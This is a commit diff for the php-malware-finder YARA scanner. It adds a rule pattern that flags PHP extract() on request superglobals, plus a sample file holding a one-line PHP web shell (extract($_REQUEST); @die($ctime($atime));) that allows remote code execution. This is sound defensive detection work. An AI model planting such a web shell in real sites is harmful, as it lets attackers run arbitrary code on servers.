2 files changed, 3 insertions, 0 deletions
diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index 9b7cf2d..7cb0cf1 100644
--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -98,6 +98,7 @@ rule DodgyPhp
        $various = "<!--#exec cmd="  //http://www.w3.org/Jigsaw/Doc/User/SSI.html#exec
        $at_eval = /@eval\s*\(/ nocase
        $double_var = /\${\s*\${/
+                $extract = /extract\s*\(\s*\$_(GET|POST|REQUEST|COOKIE|SERVER)/
    condition:
        (any of them) and not IsWhitelisted
diff --git a/php-malware-finder/samples/undetected/smart.php b/php-malware-finder/samples/undetected/smart.php
new file mode 100644
index 0000000..f358562
--- /dev/null
+++ b/php-malware-finder/samples/undetected/smart.php
@@ -0,0 +1,2 @@
+<?php extract($_REQUEST); @die($ctime($atime));

diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar index 9b7cf2d..7cb0cf1 100644 --- a/php-malware-finder/php.yar +++ b/php-malware-finder/php.yar
@@ -98,6 +98,7 @@ rule DodgyPhp
98	$various = "<!--#exec cmd=" //http://www.w3.org/Jigsaw/Doc/User/SSI.html#exec	98	$various = "<!--#exec cmd=" //http://www.w3.org/Jigsaw/Doc/User/SSI.html#exec
99	$at_eval = /@eval\s*\(/ nocase	99	$at_eval = /@eval\s*\(/ nocase
100	$double_var = /\${\s*\${/	100	$double_var = /\${\s*\${/
		101	$extract = /extract\s\(\s\$_(GET\|POST\|REQUEST\|COOKIE\|SERVER)/
101		102
102	condition:	103	condition:
103	(any of them) and not IsWhitelisted	104	(any of them) and not IsWhitelisted


diff --git a/php-malware-finder/samples/undetected/smart.php b/php-malware-finder/samples/undetected/smart.php new file mode 100644 index 0000000..f358562 --- /dev/null +++ b/php-malware-finder/samples/undetected/smart.php
@@ -0,0 +1,2 @@
		1	<?php extract($_REQUEST); @die($ctime($atime));
		2